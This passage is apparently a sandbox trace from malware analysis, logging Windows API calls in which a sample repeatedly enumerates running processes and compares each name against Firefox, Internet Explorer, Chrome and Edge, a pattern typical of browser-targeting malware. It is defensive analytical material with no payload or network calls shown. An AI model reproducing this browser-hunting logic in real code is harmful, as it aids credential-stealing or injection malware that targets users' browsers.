th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0229.430] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0229.430] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0229.430] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0229.430] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.430] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.430] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0229.430] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0229.430] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0229.430] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.430] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0229.431] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0229.431] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0229.431] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0229.431] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.431] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0229.431] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0229.431] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0229.431] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0229.431] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0229.432] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.432] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0229.432] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0229.432] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0229.432] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.432] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.433] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0229.433] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0229.433] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0229.433] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.433] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.433] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0229.433] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0229.433] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0229.433] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.433] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0229.434] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0229.434] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0229.434] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0229.434] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0229.434] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0229.434] CloseHandle (hObject=0xd4) returned 1 [0229.434] Sleep (dwMilliseconds=0x3e8) [0230.444] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0230.446] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0230.446] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0230.446] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0230.446] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0230.446] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0230.446] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0230.447] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0230.447] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0230.447] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0230.447] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0230.447] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0230.447] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0230.448] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0230.448] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0230.448] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.448] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.448] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0230.448] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0230.448] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0230.448] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.448] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0230.449] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0230.449] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0230.449] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0230.449] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.449] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0230.449] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0230.449] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0230.449] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0230.449] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.449] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0230.450] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0230.450] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0230.450] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0230.450] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.450] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0230.450] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0230.450] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0230.450] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0230.450] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.450] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0230.451] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0230.451] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0230.451] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0230.451] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.451] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0230.451] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0230.451] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0230.451] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0230.452] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.452] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.452] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.452] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.452] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.452] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.452] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.453] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.453] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.453] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.453] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.453] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.453] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.453] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.453] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.454] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.454] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.454] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.454] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.454] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.454] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.454] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.455] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.455] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.455] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.455] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.455] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0230.455] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0230.455] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0230.455] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0230.455] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.455] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.456] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.456] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.456] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.456] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.456] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.456] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.456] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.456] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.456] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.456] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0230.457] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0230.457] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0230.457] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0230.457] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.457] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0230.457] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0230.457] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0230.457] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0230.457] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.457] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0230.458] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0230.458] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0230.458] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0230.458] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.458] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0230.458] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0230.458] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0230.459] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0230.459] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.459] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0230.459] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0230.459] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0230.459] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0230.459] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.459] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0230.460] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0230.460] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0230.460] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0230.460] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.460] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0230.460] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0230.460] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0230.460] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0230.460] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.460] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0230.461] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0230.461] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0230.461] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0230.461] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.461] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0230.461] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0230.461] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0230.461] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0230.461] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.461] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0230.462] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0230.462] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0230.462] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0230.462] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0230.462] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0230.462] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0230.462] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0230.462] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0230.462] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.463] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0230.463] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0230.463] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0230.463] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0230.463] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.463] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0230.464] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0230.464] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0230.464] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0230.464] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.464] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0230.464] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0230.464] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0230.464] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0230.464] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0230.464] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, 